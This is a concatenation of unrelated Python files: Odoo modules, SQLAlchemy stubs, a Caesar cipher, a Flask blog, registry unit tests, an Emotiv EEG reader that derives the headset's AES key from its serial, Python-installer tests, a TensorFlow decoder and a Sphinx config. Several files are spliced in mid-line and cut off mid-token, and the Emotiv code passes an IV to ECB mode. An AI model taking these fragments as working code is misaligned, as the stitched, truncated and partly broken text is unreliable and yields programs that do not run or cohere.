# Copyright 2021 Alfredo de la Fuente - Avanzosc S.L. # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl). from odoo.tests import common from odoo.tests import tagged @tagged("post_install", "-at_install") class TestNameCodeYearId(common.SavepointCase): @classmethod def setUpClass(cls): super(TestNameCodeYearId, cls).setUpClass() cls.event_obj = cls.env['event.event'] cls.skill_type_lang = cls.env.ref('hr_skills.hr_skill_type_lang') cls.skill_spanish = cls.env.ref('hr_skills.hr_skill_spanish')
cls.skill_filipino = cls.env.ref('hr_skills.hr_skill_filipino') cls.skill_type_lang.skill_language = True cls.skill_spanish.code = 'SP' cls.skill_filipino.code = 'FI' def test_event_name_code_year_id(self): vals = {'name': 'User for event lang level', 'date_begin': '2025-01-06 08:00:00', 'date_end': '2025-01-15 10:00:00',
'lang_id': self.skill_spanish.id} event = self.event_obj.create(vals) name = 'SP-{}-2025'.format(event.id) self.assertEqual(event.name, name) vals = {'date_begin': '2024-01-06 08:00:00', 'lang_id': self.skill_filipino.id} event.write(vals) name = 'FI-{}-2024'.format(event.id) self.assertEqual(event.name, name)
import traceback from sqlalchemy import Column, Boolean, Integer, String, ForeignKey, create_engine from sqlalchemy.orm import relationship, sessionmaker, scoped_session from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() engine = create_engine('sqlite:///bag_of_holding.db') Base.metadata.bind = engine session_factory = sessionmaker(bind=engine) Session = scoped_session(session_factory) sessi
on = Session() class UserManager: def build_db(self): Base.metadata.create_all(engine) def add_user(self, user_name): """ Create a new user :return: """ def remove_user(self, user_name): """ Remove a current user :param user_name: :return: """ def add_user_profile(self, user_name, service_name
): """ Add a service profile to a user_name :param user_name: :param service_name: :return: """ def remove_user_profile(self, user_name, service_id): """ remove a service profile from a user_name :param user_name: :param service_id: :return: """ def add_profile_trait(self, user_name, service_id, trait_name, trait_value): """ Add a trait to a service profile :param user_name: :param service_id: :param trait_name :param trait_value :return: """ def remove_profile_trait(self, user_name, service_id, trait_id): """ Add a trait to a service profile :param user_name: :param service_id: :param trait_id :return: """ class User(Base): __tablename__ = 'users' id = Column(Integer, primary_key=True) name = Column(String) profiles = relationship('UserProfile') def __repr__(self): return '<User(id={})>'.format(self.id) class UserProfile(Base): __tablename__ = 'userprofiles' id = Column(Integer, primary_key=True) service_name = Column(String) service_url = Column(String) profile_id = Column(String) user_id = Column(Integer, ForeignKey('user.id')) def __repr__(self): return '<UserProfile(id={}, service_name={}, service_url={}, profile_id={})>'\ .format(self.id, self.service_name, self.service_url, self.profile_id) class ProfileTrait(Base): __tablename__ = 'profiletraits' id = Column(Integer, primary_key=True) name = Column(String) value = Column(String) def __repr__(self): return '<ProfileTrait(id={}, name={}, value={})>'.format(self.id, self.name, self.value)
def get_encrypted_char(k, ascii_val, ascii_list, limit): diff = k % 26 rotate_val = ascii_val + diff encrypted_char = '' if rotate_val not in ascii_list: rotate_val -= limit for i in ascii_list: rotate_val -= 1 if rotate_val == 0: encrypted_char += chr(i) else: encrypted_char += chr(rotate_val) return encrypted_char def encrypt(s, k): """ a-z : 97-122 A-Z : 65-90 :param s: string to be encrypted :param k: Integer, by which each character is rotated :return: Encrypted string """ lower_ascii_list = [i for i in range(97, 123)] upper_ascii_list = [i for i in range(65, 91)] lower_case_limit = 122 upper_case_limit = 90 encrypted_string = str() for c in s: ascii_val = ord(c) if ascii_val in lower_ascii_list or ascii_val in upper_ascii_list: limit = lower_case_limit ascii_list = lower_a
scii_list if ascii_val in upper_ascii_list: limit = upper_case_limit ascii_list = upper_ascii_list encrypted_string += get_encrypted_char(k, ascii_val, ascii_list, limit) else: encrypted_string += c
return encrypted_string l = raw_input() s = raw_input() k = int(raw_input()) print encrypt(s, k)
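# The same rotation can be expressed more compactly with modular arithmetic.
# A sketch of an equivalent encrypt(), kept Python 2 compatible to match the
# script above:
def encrypt_modular(s, k):
    out = []
    for c in s:
        if 'a' <= c <= 'z':
            out.append(chr((ord(c) - ord('a') + k) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            out.append(chr((ord(c) - ord('A') + k) % 26 + ord('A')))
        else:
            out.append(c)
    return ''.join(out)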
# -*- coding: utf-8 -*- # © 2015 Compassion CH (Nicolas Tran) # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html). from odoo import api, models class AccountPaymentOrder(models.Model): _inherit = 'account.payment.order' @api.multi def open2generated(self): """ Replace action to propose upload SEPA file to FDS. :return: window action """ action = super(Ac
countPaymentOrder, self).open2generated()
if self.payment_method_id.code == 'sepa_credit_transfer': upload_obj = self.env['payment.order.upload.sepa.wizard'] attachment_id = action['res_id'] upload_wizard = upload_obj.create({ 'attachment_id': attachment_id, 'payment_order_id': self.id, }) del action['view_id'] action.update({ 'res_model': upload_obj._name, 'res_id': upload_wizard.id, 'flags': {'initial_mode': 'edit'}, 'attachment_id': attachment_id }) return action
from flask import Blueprint, render_template, redirect, url_for from flask_blog.extensions import mongo from flask_blog.helpers import convertToObj from flask.ext.login import login_re
quired, current_user from forms import PostsForm posts = Blueprint('posts', __name__, template_folder='templates', static_folder='static', static_url_path='/%s' % __name__) @posts.route("/posts") @login_required def list(): posts = mongo.db.posts.find() return render_template('posts_list.html', posts=posts) @posts.route("/
posts/add", methods=['GET', 'POST']) @login_required def add(): form = PostsForm() if form.validate_on_submit(): mongo.db.posts.insert(_add_username(form.data)) return redirect(url_for("posts.list")) return render_template('post_add.html', form=form) @posts.route("/posts/get/<ObjectId:id>") def get(id): post = mongo.db.posts.find_one_or_404(id) return render_template('post_get.html', post=post) @posts.route("/posts/edit/<ObjectId:id>", methods=['GET', 'POST']) @login_required def edit(id): post = mongo.db.posts.find_one_or_404(id) form = PostsForm(obj=convertToObj(**post)) if form.validate_on_submit(): form.populate_obj(convertToObj(**post)) mongo.db.posts.update({'_id': id}, {'$set': form.data} ) return redirect(url_for("posts.list")) return render_template('post_edit.html', form=form, post=post) @posts.route("/posts/delete/<ObjectId:id>") @login_required def delete(id): mongo.db.posts.remove(id) return redirect(url_for("posts.list")) def _add_username(form): post = form post.update({"author": current_user.username}) return post
# copyright 2003-2012 LOGILAB S.A. (Paris, FRANCE), all rights reserved. # contact http://www.logilab.fr/ -- mailto:contact@logilab.fr # # This file is part of Logilab-Common. # # Logilab-Common is free software: you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation, either version 2.1 of the License, or (at your option) # any later version. # # Logilab-Common is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License along # with Logilab-Common. If not, see <http://www.gnu.org/licenses/>. """unit tests for selectors mechanism""" from __future__ import with_statement import gc import logging import os.path as osp import sys from operator import eq, lt, le, gt from contextlib import contextmanager logging.basicConfig(level=logging.ERROR) from logilab.common.testlib import TestCase, unittest_main from logilab.common.registry import * class _1_(Predicate): def __call__(self, *args, **kwargs): return 1 class _0_(Predicate):
def __call__(self, *args, **kwargs): return 0 def _2_(*args, **kwargs): return 2 class SelectorsTC(TestCase): def test_basic_and(self): selector = _1_() & _1_() self.assertEqual(selector(None), 2) selector = _1_() & _0_() self.assertEqual(selector(None), 0) selector = _0_() & _1_() self.assertEqual(selector(None), 0) def test_ba
sic_or(self): selector = _1_() | _1_() self.assertEqual(selector(None), 1) selector = _1_() | _0_() self.assertEqual(selector(None), 1) selector = _0_() | _1_() self.assertEqual(selector(None), 1) selector = _0_() | _0_() self.assertEqual(selector(None), 0) def test_selector_and_function(self): selector = _1_() & _2_ self.assertEqual(selector(None), 3) selector = _2_ & _1_() self.assertEqual(selector(None), 3) def test_three_and(self): selector = _1_() & _1_() & _1_() self.assertEqual(selector(None), 3) selector = _1_() & _0_() & _1_() self.assertEqual(selector(None), 0) selector = _0_() & _1_() & _1_() self.assertEqual(selector(None), 0) def test_three_or(self): selector = _1_() | _1_() | _1_() self.assertEqual(selector(None), 1) selector = _1_() | _0_() | _1_() self.assertEqual(selector(None), 1) selector = _0_() | _1_() | _1_() self.assertEqual(selector(None), 1) selector = _0_() | _0_() | _0_() self.assertEqual(selector(None), 0) def test_composition(self): selector = (_1_() & _1_()) & (_1_() & _1_()) self.assertTrue(isinstance(selector, AndPredicate)) self.assertEqual(len(selector.selectors), 4) self.assertEqual(selector(None), 4) selector = (_1_() & _0_()) | (_1_() & _1_()) self.assertTrue(isinstance(selector, OrPredicate)) self.assertEqual(len(selector.selectors), 2) self.assertEqual(selector(None), 2) def test_search_selectors(self): sel = _1_() self.assertIs(sel.search_selector(_1_), sel) csel = AndPredicate(sel, Predicate()) self.assertIs(csel.search_selector(_1_), sel) csel = AndPredicate(Predicate(), sel) self.assertIs(csel.search_selector(_1_), sel) self.assertIs(csel.search_selector((AndPredicate, OrPredicate)), csel) self.assertIs(csel.search_selector((OrPredicate, AndPredicate)), csel) self.assertIs(csel.search_selector((_1_, _0_)), sel) self.assertIs(csel.search_selector((_0_, _1_)), sel) def test_inplace_and(self): selector = _1_() selector &= _1_() selector &= _1_() self.assertEqual(selector(None), 3) selector = _1_() selector &= _0_() selector &= _1_() self.assertEqual(selector(None), 0) selector = _0_() selector &= _1_() selector &= _1_() self.assertEqual(selector(None), 0) selector = _0_() selector &= _0_() selector &= _0_() self.assertEqual(selector(None), 0) def test_inplace_or(self): selector = _1_() selector |= _1_() selector |= _1_() self.assertEqual(selector(None), 1) selector = _1_() selector |= _0_() selector |= _1_() self.assertEqual(selector(None), 1) selector = _0_() selector |= _1_() selector |= _1_() self.assertEqual(selector(None), 1) selector = _0_() selector |= _0_() selector |= _0_() self.assertEqual(selector(None), 0) def test_wrap_selectors(self): class _temp_(Predicate): def __call__(self, *args, **kwargs): return 0 del _temp_ # test weakref s1 = _1_() & _1_() s2 = _1_() & _0_() s3 = _0_() & _1_() gc.collect() self.count = 0 def decorate(f, self=self): def wrapper(*args, **kwargs): self.count += 1 return f(*args, **kwargs) return wrapper wrap_predicates(decorate) self.assertEqual(s1(None), 2) self.assertEqual(s2(None), 0) self.assertEqual(s3(None), 0) self.assertEqual(self.count, 8) @contextmanager def prepended_syspath(path): sys.path.insert(0, path) yield sys.path = sys.path[1:] class RegistryStoreTC(TestCase): def test_autoload(self): store = RegistryStore() store.setdefault('zereg') with prepended_syspath(self.datadir): store.register_objects([self.datapath('regobjects.py'), self.datapath('regobjects2.py')]) self.assertEqual(['zereg'], store.keys()) self.assertEqual(set(('appobject1', 'appobject2', 'appobject3')), set(store['zereg'])) class 
RegistrableInstanceTC(TestCase): def test_instance_modulename(self): # no inheritance obj = RegistrableInstance() self.assertEqual(obj.__module__, 'unittest_registry') # with inheritance from another python file with prepended_syspath(self.datadir): from regobjects2 import instance, MyRegistrableInstance instance2 = MyRegistrableInstance() self.assertEqual(instance.__module__, 'regobjects2') self.assertEqual(instance2.__module__, 'unittest_registry') if __name__ == '__main__': unittest_main()
#!/usr/bin/env python
import os


# Context manager
class cd:
    """Context manager for safely changing the current working directory"""

    def __init__(self, newPath):
        self.newPath = os.path.expanduser(newPath)

    def __enter__(self):
        self.savedPath = os.getcwd()
        os.chdir(self.newPath)

    def __exit__(self, etype, value, traceback):
        os.chdir(self.savedPath)
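# A short usage sketch of the cd context manager defined above: the previous
# working directory is restored on exit, even if the body raises.
if __name__ == '__main__':
    print(os.getcwd())
    with cd('~'):
        print(os.getcwd())  # now the (expanded) home directory
    print(os.getcwd())      # back where we started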
] = {'buffer_length' : 60.,} info['subdevices'] = [ ] info['subdevices'].append(create_analog_subdevice_param(_channel_names)) quality_name = ['Quality {}'.format(n) for n in _channel_names] info['subdevices'].append(create_analog_subdevice_param(quality_name)) info['subdevices'].append(create_analog_subdevice_param([ 'X','Y'])) return info def dump(obj): for attr in dir(obj): print "obj.%s = %s" % (attr, getattr(obj, attr)) class EmotivMultiSignals(DeviceBase): def __init__(self, **kargs): DeviceBase.__init__(self, **kargs) @classmethod def get_available_devices(cls): devices = OrderedDict() if WINDOWS: try: for device in hid.find_all_hid_devices(): print "device : ", device if (device.product_name == 'Emotiv RAW DATA' or device.product_name == 'EPOC BCI'): devices['Emotiv '+device.serial_number] = get_info(device) finally: pass else: serials = { } for name in os.listdir("/sys/class/hidraw"): realInputPath = os.path.realpath("/sys/class/hidraw/" + name) path = '/'.join(realInputPath.split('/')[:-4]) try: with open(path + "/manufacturer", 'r') as f: manufacturer = f.readline() if "emotiv" in manufacturer.lower(): with open(path + "/serial", 'r') as f: serial
= f.readline().strip() if serial not in serials: serials[serial] = [ ] seri
als[serial].append(name) except IOError as e: print "Couldn't open file: %s" % e for serial, names in serials.items(): device_path = '/dev/'+names[1] info = get_info(device_path) devices['Emotiv '+device_path] = info return devices def configure(self, buffer_length = 60, subdevices = None, ): self.params = {'buffer_length' : buffer_length, 'subdevices' : subdevices, } self.__dict__.update(self.params) self.configured = True def initialize(self): devices = EmotivMultiSignals.get_available_devices() self.device = devices.values()[0] if self.subdevices is None: self.subdevices = self.device['subdevices'] self.sampling_rate = 128. self.packet_size = 1 l = int(self.sampling_rate*self.buffer_length) self.buffer_length = (l - l%self.packet_size)/self.sampling_rate self.name = '{}'.format(self.device['board_name']) self.streams = [ ] for s, sub in enumerate(self.subdevices): stream = self.streamhandler.new_AnalogSignalSharedMemStream(name = self.name+str(s) , sampling_rate = self.sampling_rate, nb_channel = sub['nb_channel'], buffer_length = self.buffer_length, packet_size = self.packet_size, dtype = np.float64, channel_names = sub['by_channel_params']['channel_names'], channel_indexes = sub['by_channel_params']['channel_indexes'], ) self.streams.append(stream) def start(self): self.stop_flag = mp.Value('i', 0) #flag pultiproc = global self.process = mp.Process(target = emotiv_mainLoop, args=(self.stop_flag, self.streams, self.device) ) self.process.start() print 'FakeMultiAnalogChannel started:', self.name self.running = True def stop(self): self.stop_flag.value = 1 self.process.join() print 'FakeMultiAnalogChannel stopped:', self.name self.running = False def close(self): if WINDOWS: self.device['hid'].close() else: pass # for ii in self.streams: # self.streams[ii].stop() def setupCrypto(serial): type = 0 #feature[5] type &= 0xF type = 0 #I believe type == True is for the Dev headset, I'm not using that. That's the point of this library in the first place I thought. k = ['\0'] * 16 k[0] = serial[-1] k[1] = '\0' k[2] = serial[-2] if type: k[3] = 'H' k[4] = serial[-1] k[5] = '\0' k[6] = serial[-2] k[7] = 'T' k[8] = serial[-3] k[9] = '\x10' k[10] = serial[-4] k[11] = 'B' else: k[3] = 'T' k[4] = serial[-3] k[5] = '\x10' k[6] = serial[-4] k[7] = 'B' k[8] = serial[-1] k[9] = '\0' k[10] = serial[-2] k[11] = 'H' k[12] = serial[-3] k[13] = '\0' k[14] = serial[-4] k[15] = 'P' #It doesn't make sense to have more than one greenlet handling this as data needs to be in order anyhow. I guess you could assign an ID or something #to each packet but that seems like a waste also or is it? The ID might be useful if your using multiple headsets or usb sticks. 
key = ''.join(k) iv = Random.new().read(AES.block_size) cipher = AES.new(key, AES.MODE_ECB, iv) return cipher def get_level(data, bits): level = 0 for i in range(13, -1, -1): level <<= 1 b, o = (bits[i] / 8) + 1, bits[i] % 8 level |= (ord(data[b]) >> o) & 1 return level def emotiv_mainLoop(stop_flag, streams, device): import zmq abs_pos = pos = 0 #setup cryto cipher = setupCrypto(device['serial']) streamChan, streamImp, streamGyro = streams #Data channels socket context = zmq.Context() socket_chan = context.socket(zmq.PUB) socket_chan.bind("tcp://*:{}".format(streamChan['port'])) #Impedance channels socket socket_imp = context.socket(zmq.PUB) socket_imp.bind("tcp://*:{}".format(streamImp['port'])) #Gyro channels socket socket_gyro = context.socket(zmq.PUB) socket_gyro.bind("tcp://*:{}".format(streamGyro['port'])) packet_size = streamChan['packet_size'] sampling_rate = streamChan['sampling_rate'] np_arr_chan = streamChan['shared_array'].to_numpy_array() np_arr_imp = streamImp['shared_array'].to_numpy_array() np_arr_gyro = streamGyro['shared_array'].to_numpy_array() half_size = np_arr_chan.shape[1]/2 # same for the others impedance_qualities = { } for name in _channel_names + ['X', 'Y', 'Unknown']: impedance_qualities[name] = 0. if WINDOWS: device['hid'].open() device['hid'].set_raw_data_handler(emotiv_handler) else: hidraw = open(device['device_path']) while True: # READ DATA if WINDOWS: crypted_data = tasks.get(True) else: crypted_data = hidraw.read(32) # PROCESS data = cipher.decrypt(crypted_data[:16]) + cipher.decrypt(crypted_data[16:]) # current impedance quality sensor_num = ord(data[0]) num_to_name = { 0 : 'F3', 1:'FC5', 2 : 'AF3', 3 : 'F7', 4:'T7', 5 : 'P7', 6 : 'O1', 7 : 'O2', 8: 'P8', 9 : 'T8', 10: 'F8', 11 : 'AF4', 12 : 'FC6', 13: 'F4', 14 : 'F8', 15:'AF4', 64 : 'F3', 65 : 'FC5', 66 : 'AF3', 67 : 'F7', 68 : 'T7', 69 : 'P7', 70 : 'O1', 71 : 'O2', 72: 'P8', 73 : 'T8', 74: 'F8', 75 : 'AF4', 76 : 'FC6', 77: 'F4', 78 : 'F8', 79:'AF4', 80 : 'FC6', } if sensor_num in num_to_name: sensor_name = num_to_name[sensor_num] impedance_qualities[sensor_name] = get_le
import json import pathlib import re import pytest import snafu.versions version_paths = list(snafu.versions.VERSIONS_DIR_PATH.iterdir()) version_names = [p.stem for p in version_paths] @pytest.mark.parametrize('path', version_paths, ids=version_names) def test_version_definitions(path): assert path.suffix == '.json', '{} has wrong extension'.format(path) assert re.match(r'^\d\.\d(?:\-32)?$', path.stem), \ '{} has invalid name'.format(path) with path.open() as f: data = json.load(f) schema = data.pop('type') possible_types = snafu.versions.InstallerType.__members__ assert schema in possible_types assert isinstance(data.pop('version_info'), list) if schema == 'cpython_msi': for key in ('x86', 'amd64'): d = data.pop(key) assert d.pop('url') assert re.match(r'^[a-f\d]{32}$', d.pop('md5_sum')) elif schema == 'cpython': assert data.pop('url') assert re.match(r'^[a-f\d]{32}$', data.pop('md5_sum')) assert not data, 'superfulous keys: {}'.format(', '.join(data.keys())) def test_get_version_cpython_msi(): version = snafu.versions.get_version('3.4', force_32=False) assert version == snafu.versions.CPythonMSIVersion( name='3.4', url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.amd64.msi', md5_sum='963f67116935447fad73e09cc561c713', version_info=(3, 4, 4), ) def test_get_version_cpython_msi_switch(): version = snafu.versions.get_version('3.4', force_32=True) assert version == snafu.versions.CPythonMSIVersion( name='3.4', url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi', md5_sum='e96268f7042d2a3d14f7e23b2535738b', version_info=(3, 4, 4), ) def test_get_version_cpython(): version = snafu.versions.get_version('3.5', force_32=False) assert version == snafu.versions.CPythonVersion( name='3.5', url='https://www.python.org/ftp/python/3.5.4/python-3.5.4-amd64.exe', md5_sum='4276742a4a75a8d07260f13fe956eec4', version_info=(3, 5, 4), ) def test_get_version_cpython_switch(): version = snafu.versions.get_version('3.5', force_32=True) assert version == snafu.versions.CPythonVersion( name='3.5-32', url='https://www.python.org/ftp/python/3.5.4/python-3.5.4.exe', md5_sum='9693575358f41f452d03fd33714f223f', version_info=(3, 5, 4), forced_32=True, ) def test_get_version_not_found(): with pytest.raises(snafu.versions.VersionNotFoundError) as ctx: snafu.versions.get_version('2.8', force_32=False) assert str(ctx.value) == '2.8' @pytest.mark.parametrize('name, force_32, result', [ ('3.6', False, 'Python 3.6'), ('3.6', True, 'Python 3.6-32'), ('3.4', False, 'Python 3.4'), ('3.4', True, 'Python 3.4'), ]) def test_str(name, force_32, result): version = snafu.versions.get_version(name, force_32=force_32) assert str(version) == result @pytest.mark.parametrize('name, force_32, cmd', [ ('3.6', False, 'python3.exe'), ('3.6', True, 'python3.exe'), ('2.7', False, 'python2.exe'), ('2.7', True, 'python2.exe'), ]) def test_python_major_command(mocker, name, force_32, cmd): mocker.patch.object(snafu.versions, 'configs', **{ 'get_scripts_dir_path.return_value': pathlib.Path(), }) version = snafu.versions.get_version(name, force_32=force_32) assert version.python_major_command == pathlib.Path(cmd) @pytest.mark.parametrize('name, force_32, result', [ ('3.6', False, '3.6'), ('3.6', True, '3.6'), ('3.4', False, '3.4'), ('3.4', True, '3.4'), ]) def test_arch_free_name(name, force_32, result): version = snafu.versions.get_version(name, force_32=force_32) assert version.arch_free_name == result @pytest.mark.parametrize('name, force_32, result', [ ('3.6', False, {'3.6'}), ('3.6', True, {'3.6', '3.6-32'}), ('3.6
-32', False, {'3.6-
32'}), ('3.4', False, {'3.4'}), ('3.4', True, {'3.4'}), ]) def test_script_version_names(name, force_32, result): version = snafu.versions.get_version(name, force_32=force_32) assert version.script_version_names == result def test_is_installed(tmpdir, mocker): mock_metadata = mocker.patch.object(snafu.versions, 'metadata', **{ 'get_install_path.return_value': pathlib.Path(str(tmpdir)), }) version = snafu.versions.get_version('3.6', force_32=False) assert version.is_installed() mock_metadata.get_install_path.assert_called_once_with('3.6')
import json
from os.path import join, dirname

from jsonschema import validate

SCHEMA_FILE = "normandy-schema.json"


def assert_valid_schema(data):
    """Validate data against the bundled JSON schema.

    jsonschema.validate() raises ValidationError on failure and returns
    None on success.
    """
    schema = _load_json_schema()
    return validate(data, schema)


def _load_json_schema():
    """Load the JSON schema file that ships alongside the tests."""
    relative_path = join("schemas", SCHEMA_FILE)
    absolute_path = join(dirname(__file__), relative_path)
    with open(absolute_path) as schema_file:
        return json.load(schema_file)
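# A minimal usage sketch: jsonschema.validate() raises ValidationError when the
# payload does not match the schema, so a passing call simply returns None.
# The payload below is made up; what is actually valid depends on
# normandy-schema.json.
if __name__ == "__main__":
    example_payload = {"id": 1, "name": "example"}  # hypothetical payload
    assert_valid_schema(example_payload)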
ce: - `inputs`: (structure of) Tensors and TensorArrays that is passed as input to the RNN cell composing the decoder, at each time step. - `state`: (structure of) Tensors and TensorArrays that is passed to the RNN cell instance as the state. - `memory`: tensor that is usually the full output of the encoder, which will be used for the attention wrapper for the RNN cell. - `finished`: boolean tensor telling whether each sequence in the batch is finished. - `training`: boolean whether it should behave in training mode or in inference mode. - `outputs`: instance of `tfa.seq2seq.BasicDecoderOutput`. Result of the decoding, at each time step. """ @typechecked def __init__( self, output_time_major: bool = False, impute_finished: bool = False, maximum_iterations: Optional[TensorLike] = None, parallel_iterations: int = 32, swap_memory: bool = False, **kwargs, ): self.output_time_major = output_time_major self.impute_finished = impute_finished self.maximum_iterations = maximum_iterations self.parallel_iterations = parallel_iterations self.swap_memory = swap_memory super().__init__(**kwargs) def call(self, inputs, initial_state=None, training=None, **kwargs): init_kwargs = kwargs init_kwargs["initial_state"] = initial_state return dynamic_decode( self, output_time_major=self.output_time_major, impute_finished=self.impute_finished, maximum_iterations=self.maximum_iterations, parallel_iterations=self.parallel_iterations, swap_memory=self.swap_memory, training=training, decoder_init_input=inputs, decoder_init_kwargs=init_kwargs, ) @property def batch_size(self): """The batch size of input values.""" raise NotImplementedError @property def output_size(self): """A (possibly nested tuple of...) integer[s] or `TensorShape` object[s].""" raise NotImplementedError @property def output_dtype(self): """A (possibly nested tuple of...) dtype[s].""" raise NotImplementedError def initialize(self, inputs, initial_state=None, **kwargs): """Called before any decoding iterations. This methods must compute initial input values and initial state. Args: inputs: (structure of) tensors that contains the input for the decoder. In the normal case, it's a tensor with shape [batch, timestep, embedding]. initial_state: (structure of) tensors that contains the initial state for the RNN cell. **kwargs: Other arguments that are passed in from layer.call() method. It could contains item like input `sequence_length`, or masking for input. Returns: `(finished, initial_inputs, initial_state)`: initial values of 'finished' flags, inputs and state. """ raise NotImplementedError def step(self, time, inputs, state, training): """Called per step of decoding (but only once for dynamic decoding). Args: time: Scalar `int32` tensor. Current step number. inputs: RNN cell input (possibly nested tuple of) tensor[s] for this time step. state: RNN cell state (possibly nested tuple of) tensor[s] from previous time step. training: Python boolean. Indicates whether the layer should behave in training mode or in inference mode. Returns: `(outputs, next_state, next_inputs, finished)`: `outputs` is an object containing the decoder output, `next_state` is a (structure of) state tensors a
nd TensorArrays, `next_inputs` is the tensor that should be used as input for the next step, `finished` is
a boolean tensor telling whether the sequence is complete, for each sequence in the batch. """ raise NotImplementedError def finalize(self, outputs, final_state, sequence_lengths): raise NotImplementedError @property def tracks_own_finished(self): """Describes whether the Decoder keeps track of finished states. Most decoders will emit a true/false `finished` value independently at each time step. In this case, the `tfa.seq2seq.dynamic_decode` function keeps track of which batch entries are already finished, and performs a logical OR to insert new batches to the finished set. Some decoders, however, shuffle batches / beams between time steps and `tfa.seq2seq.dynamic_decode` will mix up the finished state across these entries because it does not track the reshuffle across time steps. In this case, it is up to the decoder to declare that it will keep track of its own finished state by setting this property to `True`. Returns: Python bool. """ return False # TODO(scottzhu): Add build/get_config/from_config and other layer methods. @typechecked def dynamic_decode( decoder: Union[Decoder, BaseDecoder], output_time_major: bool = False, impute_finished: bool = False, maximum_iterations: Optional[TensorLike] = None, parallel_iterations: int = 32, swap_memory: bool = False, training: Optional[bool] = None, scope: Optional[str] = None, enable_tflite_convertible: bool = False, **kwargs, ) -> Tuple[Any, Any, Any]: """Runs dynamic decoding with a decoder. Calls `initialize()` once and `step()` repeatedly on the decoder object. Args: decoder: A `tfa.seq2seq.Decoder` or `tfa.seq2seq.BaseDecoder` instance. output_time_major: Python boolean. Default: `False` (batch major). If `True`, outputs are returned as time major tensors (this mode is faster). Otherwise, outputs are returned as batch major tensors (this adds extra time to the computation). impute_finished: Python boolean. If `True`, then states for batch entries which are marked as finished get copied through and the corresponding outputs get zeroed out. This causes some slowdown at each time step, but ensures that the final state and outputs have the correct values and that backprop ignores time steps that were marked as finished. maximum_iterations: A strictly positive `int32` scalar, the maximum allowed number of decoding steps. Default is `None` (decode until the decoder is fully done). parallel_iterations: Argument passed to `tf.while_loop`. swap_memory: Argument passed to `tf.while_loop`. training: Python boolean. Indicates whether the layer should behave in training mode or in inference mode. Only relevant when `dropout` or `recurrent_dropout` is used. scope: Optional name scope to use. enable_tflite_convertible: Python boolean. If `True`, then the variables of `TensorArray` become of 1-D static shape. Also zero pads in the output tensor will be discarded. Default: `False`. **kwargs: dict, other keyword arguments for dynamic_decode. It might contain arguments for `BaseDecoder` to initialize, which takes all tensor inputs during call(). Returns: `(final_outputs, final_state, final_sequence_lengths)`. Raises: ValueError: if `maximum_iterations` is provided but is not a scalar. 
""" with tf.name_scope(scope or "decoder"): is_xla = ( not tf.executing_eagerly() and control_flow_util.GraphOrParentsInXlaContext( tf.compat.v1.get_default_graph() ) ) if maximum_iterations is not None: maximum_iterations = tf.convert_to_tensor( maximum_iterations, dtype=tf.int32, name="maximum_iterations" ) if maximum_iterations.shape.ndims != 0: raise ValueError("maximum_iteratio
# author : Etienne THIERY from matgen import * import random import numpy def test_symmetricPositiveDefinite(): for i in range(10): print(".", end="", flush=True) size = random.randint(400, 500) maxVal = random.randint(0, 1000) M = symmetricPositiveDefinite(size, maxVal) if not (isSymmetric(M) and isDefinitePositive(M)): return False return True de
f test_symmetricSparsePositiveDefinite(): for i in range(10): print(".", end="", flush=True) size = random.randint(400, 500) maxVal = rand
om.randint(0, 1000) nbZeros = random.randint(0, size*(size-1)) M = symmetricSparsePositiveDefinite(size, nbZeros, maxVal) if not (isSymmetric(M) and isDefinitePositive(M) and abs(numberOfZeros(M)-nbZeros) <= 1): return False return True def numberOfZeros(M): count = 0 for line in M: for coeff in line: if coeff == 0: count+=1 return count def printTest(test_func): print("Testing " + test_func.__name__[5:] + " : ", end="", flush=True) print(("" if test_func() else "un") + "expected behaviour", flush=True) printTest(test_symmetricPositiveDefinite) printTest(test_symmetricSparsePositiveDefinite)
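# ---------------------------------------------------------------------------
# For reference, a numpy-only sketch of the two predicates the tests above rely
# on. These are hypothetical helpers written here for illustration; they are
# not the matgen implementations of isSymmetric / isDefinitePositive.
import numpy as np

def is_symmetric(M, tol=1e-8):
    """A real matrix is symmetric when it equals its own transpose."""
    M = np.asarray(M)
    return np.allclose(M, M.T, atol=tol)

def is_positive_definite(M):
    """Cholesky factorization succeeds exactly for (symmetric) positive
    definite matrices, so a try/except around it is a cheap test."""
    try:
        np.linalg.cholesky(np.asarray(M))
        return True
    except np.linalg.LinAlgError:
        return False

if __name__ == "__main__":
    A = np.array([[4.0, 1.0], [1.0, 3.0]])
    print(is_symmetric(A), is_positive_definite(A))  # True True
# ---------------------------------------------------------------------------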
# -*- coding: utf-8 -*- # # HelixMC documentation build configuration file, created by # sphinx-quickstart on Thu Mar 21 15:51:36 2013. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. #import sys #import os import time # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) #sys.path.insert(0, os.path.abspath('sphinxext')) # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.mathjax', 'numpydoc' ] #Autodoc Stuffs autosummary_generate = True numpydoc_show_class_members = False def skip(app, what, name, obj, skip, options): if name == "__init__" or name == '__call__': return False return skip def setup(app): app.connect("autodoc-skip-member", skip) # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'HelixMC' copyright = u'2013-%s, Fang-Chieh Chou (GPLv3 Licence)' % time.strftime('%Y') # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. import helixmc version = helixmc.__version__ # The full version, including alpha/beta/rc tags. release = version # The language for content 